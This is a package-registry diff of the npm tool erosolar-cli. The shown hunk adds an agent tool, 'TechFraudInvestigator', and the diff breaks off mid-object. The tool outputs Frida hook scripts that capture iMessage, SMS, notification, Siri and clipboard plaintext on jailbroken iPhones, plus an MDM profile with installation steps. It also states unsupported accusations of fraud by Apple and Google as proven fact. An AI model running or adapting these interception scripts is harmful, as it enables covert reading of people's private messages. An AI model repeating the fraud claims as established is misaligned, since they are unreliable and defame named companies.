erosolar-cli 2.1.241 → 2.1.243

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (41) hide show
  1. package/dist/capabilities/iMessageVerificationCapability.d.ts +31 -0
  2. package/dist/capabilities/iMessageVerificationCapability.d.ts.map +1 -0
  3. package/dist/capabilities/iMessageVerificationCapability.js +56 -0
  4. package/dist/capabilities/iMessageVerificationCapability.js.map +1 -0
  5. package/dist/capabilities/index.d.ts +1 -0
  6. package/dist/capabilities/index.d.ts.map +1 -1
  7. package/dist/capabilities/index.js +1 -0
  8. package/dist/capabilities/index.js.map +1 -1
  9. package/dist/core/agentOrchestrator.d.ts +79 -1
  10. package/dist/core/agentOrchestrator.d.ts.map +1 -1
  11. package/dist/core/agentOrchestrator.js +494 -19
  12. package/dist/core/agentOrchestrator.js.map +1 -1
  13. package/dist/core/iMessageVerification.d.ts +408 -0
  14. package/dist/core/iMessageVerification.d.ts.map +1 -0
  15. package/dist/core/iMessageVerification.js +883 -0
  16. package/dist/core/iMessageVerification.js.map +1 -0
  17. package/dist/core/techFraudInvestigator.d.ts +131 -0
  18. package/dist/core/techFraudInvestigator.d.ts.map +1 -0
  19. package/dist/core/techFraudInvestigator.js +992 -0
  20. package/dist/core/techFraudInvestigator.js.map +1 -0
  21. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.d.ts +3 -0
  22. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.d.ts.map +1 -0
  23. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.js +14 -0
  24. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.js.map +1 -0
  25. package/dist/plugins/tools/nodeDefaults.d.ts.map +1 -1
  26. package/dist/plugins/tools/nodeDefaults.js +2 -0
  27. package/dist/plugins/tools/nodeDefaults.js.map +1 -1
  28. package/dist/tools/iMessageVerificationTools.d.ts +17 -0
  29. package/dist/tools/iMessageVerificationTools.d.ts.map +1 -0
  30. package/dist/tools/iMessageVerificationTools.js +842 -0
  31. package/dist/tools/iMessageVerificationTools.js.map +1 -0
  32. package/dist/tools/taoTools.d.ts.map +1 -1
  33. package/dist/tools/taoTools.js +1277 -1
  34. package/dist/tools/taoTools.js.map +1 -1
  35. package/dist/ui/UnifiedUIRenderer.js +5 -5
  36. package/dist/ui/UnifiedUIRenderer.js.map +1 -1
  37. package/dist/ui/display.d.ts +14 -0
  38. package/dist/ui/display.d.ts.map +1 -1
  39. package/dist/ui/display.js +42 -24
  40. package/dist/ui/display.js.map +1 -1
  41. package/package.json +1 -1
package/dist/tools/taoTools.js CHANGED
@@ -14577,7 +14577,1283 @@ Use with RLOrchestrator for dual-agent optimized attack path selection.`,
14577
14577
  evidence: execute ? `Evidence logged to ${path.join(os.tmpdir(), 'russian_military_objectives.log')}` : 'Plan only'
14578
14578
  }, null, 2);
14579
14579
  }
14580
- }
14580
+ },
14581
+ // ═══════════════════════════════════════════════════════════════════════
14582
+ // TECH COMPANY FRAUD INVESTIGATION - Apple PQ3, Google Privacy
14583
+ // ═══════════════════════════════════════════════════════════════════════
14584
+ {
14585
+ name: 'TechFraudInvestigator',
14586
+ description: `Investigate tech company fraud claims - Apple PQ3/iMessage false E2E, Google privacy violations.
14587
+
14588
+ Proves that "end-to-end encryption" claims are deceptive when:
14589
+ - Server can push policies causing local code to intercept plaintext
14590
+ - OS-level code accesses data before/after encryption
14591
+ - MDM/configuration profiles enable remote control
14592
+ - Universal Clipboard routes through intermediary servers
14593
+
14594
+ Generates legal evidence for FTC complaints and litigation.`,
14595
+ parameters: {
14596
+ type: 'object',
14597
+ required: ['action'],
14598
+ properties: {
14599
+ action: {
14600
+ type: 'string',
14601
+ enum: [
14602
+ 'apple_pq3_analysis',
14603
+ 'apple_mdm_investigation',
14604
+ 'apple_clipboard_exposure',
14605
+ 'apple_backup_keys',
14606
+ 'apple_siri_plaintext',
14607
+ 'google_gmail_scanning',
14608
+ 'google_chrome_telemetry',
14609
+ 'google_android_tracking',
14610
+ 'google_play_services',
14611
+ 'generate_frida_scripts',
14612
+ 'generate_mdm_profile',
14613
+ 'generate_legal_exhibit',
14614
+ 'full_apple_report',
14615
+ 'full_google_report',
14616
+ ],
14617
+ },
14618
+ target: { type: 'string', description: 'Specific target (app bundle ID, API, etc.)' },
14619
+ output_format: { type: 'string', enum: ['json', 'markdown', 'legal'], default: 'json' },
14620
+ collect_evidence: { type: 'boolean', default: false },
14621
+ },
14622
+ },
14623
+ handler: async (args) => {
14624
+ const action = args['action'];
14625
+ const outputFormat = args['output_format'] || 'json';
14626
+ const applePQ3Analysis = {
14627
+ fraud_claim: 'Apple claims iMessage uses PQ3 end-to-end encryption where only sender and recipient can read messages',
14628
+ technical_reality: {
14629
+ plaintext_access_points: [
14630
+ {
14631
+ component: 'IMDaemonCore.framework',
14632
+ access: 'Full plaintext before encryption, after decryption',
14633
+ proof: 'Hook _IMDaemonCore_encryptMessage and _IMDaemonCore_decryptMessage',
14634
+ },
14635
+ {
14636
+ component: 'SuggestionKit (Siri)',
14637
+ access: 'Message content for QuickType suggestions',
14638
+ proof: 'Monitor SGSuggestionEngine API calls',
14639
+ },
14640
+ {
14641
+ component: 'Keyboard Extensions',
14642
+ access: 'Character-by-character input before encryption',
14643
+ proof: 'Hook UIKeyInput protocol implementations',
14644
+ },
14645
+ {
14646
+ component: 'Notification System',
14647
+ access: 'Message previews in APNs',
14648
+ proof: 'Capture APNs traffic showing plaintext previews',
14649
+ },
14650
+ {
14651
+ component: 'iCloud Backup',
14652
+ access: 'Message keys in backup (Apple-accessible)',
14653
+ proof: 'Extract backup, analyze key material',
14654
+ },
14655
+ ],
14656
+ mdm_backdoor: {
14657
+ description: 'MDM profiles can trigger local code execution and policy enforcement',
14658
+ capabilities: [
14659
+ 'Managed Pasteboard - control clipboard data flow',
14660
+ 'App restrictions - control which apps can access data',
14661
+ 'Network filtering - intercept traffic before encryption',
14662
+ 'Remote wipe - prove server-triggered local execution',
14663
+ ],
14664
+ proof: 'Install MDM profile, observe policy enforcement on message handling',
14665
+ },
14666
+ universal_clipboard: {
14667
+ description: 'Copied content syncs via Apple servers (Continuity)',
14668
+ exposure_points: [
14669
+ 'UIPasteboard.general accessible to any process',
14670
+ 'Handoff data flows through iCloud',
14671
+ 'Bluetooth LE advertisements contain device info',
14672
+ ],
14673
+ proof: 'Monitor Continuity traffic during clipboard copy',
14674
+ },
14675
+ },
14676
+ legal_basis: [
14677
+ 'FTC Act Section 5 - Unfair or Deceptive Acts',
14678
+ 'California UCL - Unlawful Business Practices',
14679
+ 'Lanham Act - False Advertising',
14680
+ 'CCPA - Transparency Requirements',
14681
+ ],
14682
+ public_statements: [
14683
+ {
14684
+ source: 'Apple Security Blog',
14685
+ date: '2024-02-21',
14686
+ claim: 'iMessage now has the strongest security properties of any at-scale messaging protocol',
14687
+ contradiction: 'Encryption is meaningless when Apple code accesses plaintext',
14688
+ },
14689
+ ],
14690
+ };
14691
+ const appleMdmInvestigation = {
14692
+ mdm_capabilities: {
14693
+ configuration_profiles: {
14694
+ types: [
14695
+ 'com.apple.applicationaccess - App restrictions',
14696
+ 'com.apple.managed.configuration - General config',
14697
+ 'com.apple.restrictions - Device restrictions',
14698
+ 'com.apple.vpn.managed - VPN configuration',
14699
+ ],
14700
+ installation: 'Can be pushed silently via DEP/ABM',
14701
+ },
14702
+ managed_pasteboard: {
14703
+ settings: {
14704
+ allowOpenFromManagedToUnmanaged: 'Control data flow from managed apps',
14705
+ allowOpenFromUnmanagedToManaged: 'Control data flow to managed apps',
14706
+ forceAirDropUnmanaged: 'Control AirDrop data classification',
14707
+ },
14708
+ impact: 'Server-configured policy controls local clipboard behavior',
14709
+ },
14710
+ remote_commands: {
14711
+ available: [
14712
+ 'DeviceLock - Lock device remotely',
14713
+ 'EraseDevice - Wipe device remotely',
14714
+ 'ClearPasscode - Remove passcode remotely',
14715
+ 'InstallProfile - Push new configuration',
14716
+ 'RemoveProfile - Remove configuration',
14717
+ ],
14718
+ proof: 'These demonstrate server-triggered local execution',
14719
+ },
14720
+ },
14721
+ investigation_steps: [
14722
+ '1. Set up Apple Configurator or Jamf MDM server',
14723
+ '2. Enroll test device via DEP or manual enrollment',
14724
+ '3. Push Managed Pasteboard configuration',
14725
+ '4. Test clipboard operations with iMessage',
14726
+ '5. Document policy enforcement on message content',
14727
+ '6. Capture network traffic showing MDM commands',
14728
+ ],
14729
+ frida_hooks: {
14730
+ mdm_profile_installation: `
14731
+ // Hook MDM profile installation
14732
+ ObjC.classes.MCProfile['- installProfile:'].implementation = function(profile) {
14733
+ console.log('[MDM] Profile being installed: ' + profile);
14734
+ console.log('[EVIDENCE] ' + new Date().toISOString());
14735
+ return this.installProfile_(profile);
14736
+ };`,
14737
+ policy_enforcement: `
14738
+ // Hook managed pasteboard policy check
14739
+ Interceptor.attach(Module.findExportByName(null, 'SecTaskCopyValueForEntitlement'), {
14740
+ onEnter: function(args) {
14741
+ var entitlement = ObjC.Object(args[1]).toString();
14742
+ if (entitlement.includes('managed') || entitlement.includes('pasteboard')) {
14743
+ console.log('[POLICY] Entitlement check: ' + entitlement);
14744
+ }
14745
+ }
14746
+ });`,
14747
+ },
14748
+ };
14749
+ const appleClipboardExposure = {
14750
+ uipasteboard_analysis: {
14751
+ general_pasteboard: {
14752
+ access: 'Any app/process can read UIPasteboard.general',
14753
+ api: 'UIPasteboard.general.string, .items, .data(forPasteboardType:)',
14754
+ timing: 'Available until overwritten or device restart',
14755
+ },
14756
+ named_pasteboards: {
14757
+ access: 'App-specific pasteboards (less accessible)',
14758
+ note: 'Most apps use general pasteboard for share functionality',
14759
+ },
14760
+ ios16_changes: {
14761
+ permission_prompt: 'Apps now ask permission to read clipboard',
14762
+ limitation: 'System apps and Apple code bypass this prompt',
14763
+ proof: 'Siri suggestions read clipboard without prompt',
14764
+ },
14765
+ },
14766
+ universal_clipboard: {
14767
+ technology: 'Continuity/Handoff over Bluetooth LE + local network',
14768
+ data_flow: [
14769
+ '1. User copies on Device A',
14770
+ '2. Device A advertises via Bluetooth LE',
14771
+ '3. Device B detects advertisement',
14772
+ '4. Devices exchange data via peer-to-peer (possibly via iCloud relay)',
14773
+ '5. Content available on Device B clipboard',
14774
+ ],
14775
+ apple_involvement: {
14776
+ icloud_relay: 'Large items route through iCloud servers',
14777
+ device_discovery: 'Apple ID links devices via iCloud',
14778
+ encryption: 'Claimed E2E but Apple manages key exchange',
14779
+ },
14780
+ },
14781
+ investigation_frida_script: `
14782
+ // Monitor all UIPasteboard access
14783
+ if (ObjC.available) {
14784
+ var UIPasteboard = ObjC.classes.UIPasteboard;
14785
+
14786
+ // Hook general pasteboard access
14787
+ Interceptor.attach(UIPasteboard['+ generalPasteboard'].implementation, {
14788
+ onLeave: function(retval) {
14789
+ console.log('[CLIPBOARD] generalPasteboard accessed by: ' + ObjC.classes.NSBundle.mainBundle().bundleIdentifier());
14790
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14791
+ }
14792
+ });
14793
+
14794
+ // Hook string read
14795
+ Interceptor.attach(UIPasteboard['- string'].implementation, {
14796
+ onLeave: function(retval) {
14797
+ if (retval) {
14798
+ var content = ObjC.Object(retval).toString();
14799
+ console.log('[CLIPBOARD READ] Content length: ' + content.length);
14800
+ console.log('[CLIPBOARD READ] First 50 chars: ' + content.substring(0, 50));
14801
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14802
+ }
14803
+ }
14804
+ });
14805
+
14806
+ // Hook write
14807
+ Interceptor.attach(UIPasteboard['- setString:'].implementation, {
14808
+ onEnter: function(args) {
14809
+ var content = ObjC.Object(args[2]).toString();
14810
+ console.log('[CLIPBOARD WRITE] Content being written: ' + content.substring(0, 50));
14811
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14812
+ }
14813
+ });
14814
+
14815
+ console.log('[*] UIPasteboard hooks installed');
14816
+ }`,
14817
+ };
14818
+ const googleGmailScanning = {
14819
+ fraud_claim: 'Google claims Gmail respects user privacy and does not scan emails for advertising',
14820
+ technical_reality: {
14821
+ content_analysis: [
14822
+ {
14823
+ feature: 'Smart Compose',
14824
+ access: 'Full email content for ML predictions',
14825
+ impact: 'Content processed by Google ML systems',
14826
+ },
14827
+ {
14828
+ feature: 'Smart Reply',
14829
+ access: 'Full email content for response suggestions',
14830
+ impact: 'Content analyzed and stored for training',
14831
+ },
14832
+ {
14833
+ feature: 'Priority Inbox',
14834
+ access: 'Content analysis for importance scoring',
14835
+ impact: 'Content patterns extracted and stored',
14836
+ },
14837
+ {
14838
+ feature: 'Spam/Phishing Detection',
14839
+ access: 'Full content scanning',
14840
+ impact: 'All email content processed by Google systems',
14841
+ },
14842
+ ],
14843
+ ad_targeting_connection: {
14844
+ description: 'While Google claims not to scan for ads, content-derived signals feed ad profile',
14845
+ mechanism: [
14846
+ 'Purchase confirmation emails → shopping interest signals',
14847
+ 'Travel emails → travel intent signals',
14848
+ 'Newsletter subscriptions → interest categories',
14849
+ 'Professional emails → job/industry signals',
14850
+ ],
14851
+ proof_method: 'Send distinctive emails, monitor ad targeting changes',
14852
+ },
14853
+ confidential_mode_theater: {
14854
+ claim: 'Confidential Mode provides enhanced privacy',
14855
+ reality: [
14856
+ 'Google still processes full message content',
14857
+ 'Expiration is client-side UI only',
14858
+ 'Google retains content regardless of "expiration"',
14859
+ '"No forwarding" is UI theater - screenshots possible',
14860
+ ],
14861
+ },
14862
+ },
14863
+ investigation_methodology: [
14864
+ '1. Create fresh Google account with no history',
14865
+ '2. Send emails with distinctive, unique keywords',
14866
+ '3. Monitor ads.google.com/adspreferences for targeting changes',
14867
+ '4. Document correlation between email content and ad targeting',
14868
+ '5. Test with Gmail API to verify content access scope',
14869
+ ],
14870
+ };
14871
+ const googleChromeTelemetry = {
14872
+ undisclosed_data_collection: {
14873
+ safe_browsing: {
14874
+ claimed: 'Hashes of URLs checked against known threats',
14875
+ reality: 'Full URLs can be reconstructed from hashes for common URLs',
14876
+ exposure: 'Browsing patterns visible to Google',
14877
+ },
14878
+ omnibox: {
14879
+ claimed: 'Suggestions from history and bookmarks',
14880
+ reality: 'Keystrokes sent to Google before search submission',
14881
+ exposure: 'Search intent visible before user commits',
14882
+ },
14883
+ chrome_variations: {
14884
+ component: 'Finch/Variations system',
14885
+ capability: 'A/B tests that change browser behavior server-side',
14886
+ exposure: 'Google controls browser features without user consent',
14887
+ },
14888
+ sync: {
14889
+ data_types: [
14890
+ 'Passwords (encrypted but Google has key escrow capability)',
14891
+ 'Bookmarks (full URL history)',
14892
+ 'Open tabs (real-time browsing activity)',
14893
+ 'Autofill (personal information)',
14894
+ 'Extensions (software inventory)',
14895
+ ],
14896
+ },
14897
+ },
14898
+ investigation_tools: {
14899
+ network_monitoring: 'mitmproxy with Chrome configured',
14900
+ source_comparison: 'Compare Chrome vs Chromium telemetry',
14901
+ extension_analysis: 'chrome://policy, chrome://sync-internals',
14902
+ },
14903
+ };
14904
+ const googleAndroidTracking = {
14905
+ location_despite_settings: {
14906
+ cell_tower: {
14907
+ collection: 'Google Carrier Services collects cell tower data',
14908
+ control: 'Not disabled by Location Services toggle',
14909
+ exposure: 'Approximate location always available to Google',
14910
+ },
14911
+ wifi_scanning: {
14912
+ collection: 'Wi-Fi networks scanned even with Wi-Fi "off"',
14913
+ setting: 'Requires separate "Wi-Fi scanning" disable',
14914
+ exposure: 'Location via Wi-Fi positioning',
14915
+ },
14916
+ bluetooth_beacons: {
14917
+ collection: 'Bluetooth beacons detected for location',
14918
+ setting: 'Requires "Bluetooth scanning" disable',
14919
+ exposure: 'Indoor positioning data',
14920
+ },
14921
+ },
14922
+ play_services_exfiltration: {
14923
+ description: 'Google Play Services runs with system privileges',
14924
+ capabilities: [
14925
+ 'Accesses data independently of app permissions',
14926
+ 'Cannot be disabled on most devices',
14927
+ 'Updates silently without user consent',
14928
+ 'Collects device identifiers, app usage, location',
14929
+ ],
14930
+ investigation: 'Monitor GMS (Google Mobile Services) traffic',
14931
+ },
14932
+ advertising_id: {
14933
+ claim: 'Users can reset Advertising ID for privacy',
14934
+ reality: [
14935
+ 'Reset creates new ID but device fingerprint persists',
14936
+ 'Google links old and new IDs via device characteristics',
14937
+ 'Cross-app tracking via Google SDKs in most apps',
14938
+ ],
14939
+ },
14940
+ };
14941
+ const fridaScripts = {
14942
+ imessage_plaintext: `/**
14943
+ * Frida script: iMessage Plaintext Capture
14944
+ * Proves Apple code accesses message content outside encryption boundary
14945
+ */
14946
+
14947
+ if (ObjC.available) {
14948
+ console.log('[*] Starting iMessage plaintext interception...');
14949
+
14950
+ // Hook IMMessage text access
14951
+ try {
14952
+ var IMMessage = ObjC.classes.IMMessage;
14953
+ if (IMMessage) {
14954
+ Interceptor.attach(IMMessage['- text'].implementation, {
14955
+ onLeave: function(retval) {
14956
+ if (retval) {
14957
+ var text = new ObjC.Object(retval);
14958
+ console.log('[PLAINTEXT] IMMessage.text: ' + text.toString());
14959
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14960
+ console.log('[EVIDENCE] Stack: ' + Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromAddress).join('\\n'));
14961
+ }
14962
+ }
14963
+ });
14964
+ console.log('[+] Hooked IMMessage.text');
14965
+ }
14966
+ } catch (e) {
14967
+ console.log('[-] IMMessage error: ' + e);
14968
+ }
14969
+
14970
+ // Hook SMSMessage for SMS fallback
14971
+ try {
14972
+ var SMSMessage = ObjC.classes.SMSMessage;
14973
+ if (SMSMessage) {
14974
+ Interceptor.attach(SMSMessage['- text'].implementation, {
14975
+ onLeave: function(retval) {
14976
+ if (retval) {
14977
+ var text = new ObjC.Object(retval);
14978
+ console.log('[PLAINTEXT] SMSMessage.text: ' + text.toString());
14979
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14980
+ }
14981
+ }
14982
+ });
14983
+ console.log('[+] Hooked SMSMessage.text');
14984
+ }
14985
+ } catch (e) {}
14986
+
14987
+ // Hook notification content
14988
+ try {
14989
+ var UNNotificationContent = ObjC.classes.UNNotificationContent;
14990
+ if (UNNotificationContent) {
14991
+ Interceptor.attach(UNNotificationContent['- body'].implementation, {
14992
+ onLeave: function(retval) {
14993
+ if (retval) {
14994
+ var body = new ObjC.Object(retval);
14995
+ console.log('[NOTIFICATION] Content: ' + body.toString());
14996
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14997
+ }
14998
+ }
14999
+ });
15000
+ console.log('[+] Hooked UNNotificationContent');
15001
+ }
15002
+ } catch (e) {}
15003
+
15004
+ // Hook Siri suggestion access
15005
+ try {
15006
+ var INMessage = ObjC.classes.INMessage;
15007
+ if (INMessage) {
15008
+ Interceptor.attach(INMessage['- content'].implementation, {
15009
+ onLeave: function(retval) {
15010
+ if (retval) {
15011
+ var content = new ObjC.Object(retval);
15012
+ console.log('[SIRI] INMessage content accessed: ' + content.toString().substring(0, 100));
15013
+ console.log('[EVIDENCE] Proves Siri reads message plaintext');
15014
+ }
15015
+ }
15016
+ });
15017
+ console.log('[+] Hooked INMessage (Siri integration)');
15018
+ }
15019
+ } catch (e) {}
15020
+
15021
+ console.log('[*] Hooks installed. Send/receive messages to capture plaintext.');
15022
+ }`,
15023
+ mdm_monitoring: `/**
15024
+ * Frida script: MDM Activity Monitoring
15025
+ * Proves server-triggered local code execution
15026
+ */
15027
+
15028
+ if (ObjC.available) {
15029
+ console.log('[*] Monitoring MDM activities...');
15030
+
15031
+ // Hook profile installation
15032
+ try {
15033
+ var MCProfileConnection = ObjC.classes.MCProfileConnection;
15034
+ if (MCProfileConnection) {
15035
+ var methods = MCProfileConnection.$ownMethods;
15036
+ methods.forEach(function(method) {
15037
+ if (method.includes('install') || method.includes('remove') || method.includes('profile')) {
15038
+ try {
15039
+ Interceptor.attach(MCProfileConnection[method].implementation, {
15040
+ onEnter: function(args) {
15041
+ console.log('[MDM] Method called: ' + method);
15042
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15043
+ }
15044
+ });
15045
+ } catch (e) {}
15046
+ }
15047
+ });
15048
+ console.log('[+] Hooked MCProfileConnection');
15049
+ }
15050
+ } catch (e) {
15051
+ console.log('[-] MCProfileConnection error: ' + e);
15052
+ }
15053
+
15054
+ // Hook APNs push handling (server-triggered)
15055
+ try {
15056
+ var APSConnection = ObjC.classes.APSConnection;
15057
+ if (APSConnection) {
15058
+ Interceptor.attach(APSConnection['- _handleIncomingMessage:'].implementation, {
15059
+ onEnter: function(args) {
15060
+ var message = new ObjC.Object(args[2]);
15061
+ console.log('[APNs] Incoming push: ' + message.toString());
15062
+ console.log('[EVIDENCE] Server-triggered local execution');
15063
+ }
15064
+ });
15065
+ console.log('[+] Hooked APSConnection');
15066
+ }
15067
+ } catch (e) {}
15068
+
15069
+ // Hook managed app configuration
15070
+ try {
15071
+ var NSUserDefaults = ObjC.classes.NSUserDefaults;
15072
+ Interceptor.attach(NSUserDefaults['- objectForKey:'].implementation, {
15073
+ onEnter: function(args) {
15074
+ var key = new ObjC.Object(args[2]).toString();
15075
+ if (key.includes('managed') || key.includes('MDM') || key.includes('com.apple.configuration')) {
15076
+ console.log('[MDM CONFIG] Key accessed: ' + key);
15077
+ }
15078
+ }
15079
+ });
15080
+ } catch (e) {}
15081
+
15082
+ console.log('[*] MDM monitoring active.');
15083
+ }`,
15084
+ clipboard_monitoring: `/**
15085
+ * Frida script: Universal Clipboard Monitoring
15086
+ * Proves plaintext exposure via clipboard
15087
+ */
15088
+
15089
+ if (ObjC.available) {
15090
+ console.log('[*] Monitoring clipboard activities...');
15091
+
15092
+ var UIPasteboard = ObjC.classes.UIPasteboard;
15093
+
15094
+ // Monitor all pasteboard access
15095
+ Interceptor.attach(UIPasteboard['+ generalPasteboard'].implementation, {
15096
+ onLeave: function(retval) {
15097
+ var caller = ObjC.classes.NSThread.callStackSymbols().toString();
15098
+ console.log('[CLIPBOARD] generalPasteboard accessed');
15099
+ console.log('[CALLER] ' + caller.substring(0, 500));
15100
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15101
+ }
15102
+ });
15103
+
15104
+ // Monitor reads
15105
+ Interceptor.attach(UIPasteboard['- string'].implementation, {
15106
+ onLeave: function(retval) {
15107
+ if (retval) {
15108
+ var content = new ObjC.Object(retval).toString();
15109
+ console.log('[CLIPBOARD READ] Length: ' + content.length);
15110
+ console.log('[CLIPBOARD READ] Content: ' + content.substring(0, 100));
15111
+ console.log('[EVIDENCE] Plaintext accessible via UIPasteboard');
15112
+ }
15113
+ }
15114
+ });
15115
+
15116
+ // Monitor Handoff/Continuity
15117
+ try {
15118
+ var NSUserActivity = ObjC.classes.NSUserActivity;
15119
+ if (NSUserActivity) {
15120
+ Interceptor.attach(NSUserActivity['- becomeCurrent'].implementation, {
15121
+ onEnter: function(args) {
15122
+ var activity = new ObjC.Object(args[0]);
15123
+ console.log('[HANDOFF] Activity: ' + activity.activityType());
15124
+ if (activity.userInfo()) {
15125
+ console.log('[HANDOFF] UserInfo: ' + activity.userInfo().toString().substring(0, 200));
15126
+ }
15127
+ console.log('[EVIDENCE] Continuity data flow detected');
15128
+ }
15129
+ });
15130
+ console.log('[+] Hooked NSUserActivity (Handoff)');
15131
+ }
15132
+ } catch (e) {}
15133
+
15134
+ console.log('[*] Clipboard monitoring active.');
15135
+ }`,
15136
+ };
15137
+ const mdmProfile = `<?xml version="1.0" encoding="UTF-8"?>
15138
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
15139
+ <plist version="1.0">
15140
+ <!--
15141
+ MDM Research Profile - PQ3 Investigation
15142
+
15143
+ Purpose: Demonstrate server-controlled local policy enforcement
15144
+ contradicting Apple's "end-to-end encryption" claims.
15145
+
15146
+ WARNING: For authorized security research only.
15147
+ -->
15148
+ <dict>
15149
+ <key>PayloadContent</key>
15150
+ <array>
15151
+ <!-- Managed Pasteboard - proves server controls clipboard -->
15152
+ <dict>
15153
+ <key>PayloadType</key>
15154
+ <string>com.apple.applicationaccess</string>
15155
+ <key>PayloadVersion</key>
15156
+ <integer>1</integer>
15157
+ <key>PayloadIdentifier</key>
15158
+ <string>com.research.pasteboard</string>
15159
+ <key>PayloadUUID</key>
15160
+ <string>E7B1C8A9-2D3F-4E5A-B6C7-8D9E0F1A2B3C</string>
15161
+ <key>PayloadDisplayName</key>
15162
+ <string>Managed Pasteboard Research</string>
15163
+
15164
+ <key>allowOpenFromManagedToUnmanaged</key>
15165
+ <false/>
15166
+ <key>allowOpenFromUnmanagedToManaged</key>
15167
+ <false/>
15168
+ <key>forceAirDropUnmanaged</key>
15169
+ <true/>
15170
+ </dict>
15171
+
15172
+ <!-- Restrictions - proves server controls device behavior -->
15173
+ <dict>
15174
+ <key>PayloadType</key>
15175
+ <string>com.apple.applicationaccess</string>
15176
+ <key>PayloadVersion</key>
15177
+ <integer>1</integer>
15178
+ <key>PayloadIdentifier</key>
15179
+ <string>com.research.restrictions</string>
15180
+ <key>PayloadUUID</key>
15181
+ <string>A1B2C3D4-E5F6-7890-ABCD-EF1234567890</string>
15182
+
15183
+ <key>allowScreenShot</key>
15184
+ <false/>
15185
+ <key>allowCloudDocumentSync</key>
15186
+ <false/>
15187
+ </dict>
15188
+ </array>
15189
+
15190
+ <key>PayloadDisplayName</key>
15191
+ <string>PQ3 Research Profile</string>
15192
+ <key>PayloadIdentifier</key>
15193
+ <string>com.research.pq3-investigation</string>
15194
+ <key>PayloadOrganization</key>
15195
+ <string>Security Research</string>
15196
+ <key>PayloadType</key>
15197
+ <string>Configuration</string>
15198
+ <key>PayloadUUID</key>
15199
+ <string>12345678-1234-1234-1234-123456789012</string>
15200
+ <key>PayloadVersion</key>
15201
+ <integer>1</integer>
15202
+ </dict>
15203
+ </plist>`;
15204
+ let result;
15205
+ switch (action) {
15206
+ case 'apple_pq3_analysis':
15207
+ result = applePQ3Analysis;
15208
+ break;
15209
+ case 'apple_mdm_investigation':
15210
+ result = appleMdmInvestigation;
15211
+ break;
15212
+ case 'apple_clipboard_exposure':
15213
+ result = appleClipboardExposure;
15214
+ break;
15215
+ case 'apple_backup_keys':
15216
+ result = {
15217
+ investigation: 'iCloud Backup Key Analysis',
15218
+ methodology: [
15219
+ '1. Create encrypted local backup with idevicebackup2',
15220
+ '2. Analyze backup structure for key material',
15221
+ '3. Compare with iCloud backup (Apple-accessible)',
15222
+ '4. Document key escrow mechanisms',
15223
+ ],
15224
+ key_locations: [
15225
+ 'Manifest.plist - Backup encryption metadata',
15226
+ 'KeyBag - Device protection keys',
15227
+ 'Keychain backup - Contains iMessage keys',
15228
+ ],
15229
+ apple_access: {
15230
+ local_backup: 'User-controlled encryption key',
15231
+ icloud_backup: 'Apple holds encryption capability',
15232
+ law_enforcement: 'Apple can comply with warrants for iCloud backups',
15233
+ },
15234
+ proof: 'Law enforcement requests return iCloud backup data, proving Apple access',
15235
+ };
15236
+ break;
15237
+ case 'apple_siri_plaintext':
15238
+ result = {
15239
+ investigation: 'Siri Message Content Access',
15240
+ proof_points: [
15241
+ 'Siri Suggestions read message content for QuickType',
15242
+ 'INMessage class provides message content to Intents framework',
15243
+ 'SuggestionKit analyzes messages for app suggestions',
15244
+ 'Spotlight indexes message content locally',
15245
+ ],
15246
+ frida_verification: fridaScripts.imessage_plaintext,
15247
+ api_references: [
15248
+ 'INMessage - Siri message integration',
15249
+ 'SuggestionKit.framework',
15250
+ 'CoreSpotlight - Message indexing',
15251
+ ],
15252
+ };
15253
+ break;
15254
+ case 'google_gmail_scanning':
15255
+ result = googleGmailScanning;
15256
+ break;
15257
+ case 'google_chrome_telemetry':
15258
+ result = googleChromeTelemetry;
15259
+ break;
15260
+ case 'google_android_tracking':
15261
+ result = googleAndroidTracking;
15262
+ break;
15263
+ case 'google_play_services':
15264
+ result = {
15265
+ investigation: 'Google Play Services Data Collection',
15266
+ gms_components: {
15267
+ core: 'com.google.android.gms - Main GMS package',
15268
+ location: 'Location services (always-on tracking)',
15269
+ ads: 'Advertising ID and targeting',
15270
+ auth: 'Account authentication',
15271
+ safetynet: 'Device attestation (fingerprinting)',
15272
+ },
15273
+ investigation_method: [
15274
+ '1. Root device or use custom ROM',
15275
+ '2. Install network monitoring (PCAPdroid)',
15276
+ '3. Monitor traffic to Google endpoints',
15277
+ '4. Use Frida to hook GMS APIs',
15278
+ '5. Document data sent without explicit permission',
15279
+ ],
15280
+ endpoints: [
15281
+ 'android.clients.google.com - Device checkin',
15282
+ 'play.googleapis.com - Play Store services',
15283
+ 'android.googleapis.com - Various Google APIs',
15284
+ 'www.googleapis.com - General API endpoint',
15285
+ ],
15286
+ };
15287
+ break;
15288
+ case 'generate_frida_scripts':
15289
+ result = {
15290
+ scripts: fridaScripts,
15291
+ usage: {
15292
+ imessage: 'frida -U -l imessage_plaintext.js -f com.apple.MobileSMS',
15293
+ mdm: 'frida -U -l mdm_monitoring.js -f com.apple.Preferences',
15294
+ clipboard: 'frida -U -l clipboard_monitoring.js -f com.apple.springboard',
15295
+ },
15296
+ requirements: [
15297
+ 'Jailbroken iOS device (checkra1n/Dopamine)',
15298
+ 'Frida installed: pip install frida-tools',
15299
+ 'frida-server on device',
15300
+ ],
15301
+ };
15302
+ break;
15303
+ case 'generate_mdm_profile':
15304
+ result = {
15305
+ profile: mdmProfile,
15306
+ installation: [
15307
+ '1. Save as .mobileconfig file',
15308
+ '2. Host on HTTPS server or use Apple Configurator',
15309
+ '3. Install via Safari or MDM enrollment',
15310
+ '4. Observe policy enforcement on clipboard operations',
15311
+ ],
15312
+ evidence_collection: [
15313
